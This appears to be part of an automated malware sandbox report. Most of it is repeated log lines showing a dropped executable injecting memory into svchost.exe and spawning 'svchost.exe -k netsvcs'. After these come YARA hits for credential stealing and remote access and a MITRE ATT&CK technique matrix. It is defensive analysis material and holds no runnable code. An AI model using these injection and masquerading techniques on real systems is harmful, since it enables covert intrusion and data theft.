      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191D0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191D8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191E0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191E8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191F0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191F8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019200Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019208Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019210Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019218Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019220Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019228Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019230Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019238Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019240Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019248Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019250Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019258Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019260Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019268Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019270Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019278Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019008Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019018Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019020Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019028Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019030Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019038Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019040Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019048Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019050Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019058Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019060Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019068Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019070Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019078Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019080Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019088Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019090Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019098Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190A0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019288Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019290Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190B8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190C0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190C8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190D0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190D8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190E8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190F0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190F8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019100Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019108Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019110Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019118Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019120Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019128Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019130Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019138Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019140Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe -k netsvcsJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe -k netsvcsJump to behavior
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_00000001400182FC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_00000001400182FC

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5496, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5496, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Native API
      1
      DLL Side-Loading
      411
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      21
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      411
      Process Injection
      LSASS Memory211
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
      Software Packing
      Security Account Manager2
      System Network Configuration Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading
      NTDS1
      File and Directory Discovery
      Distributed Component Object ModelInput Capture114
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets13
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
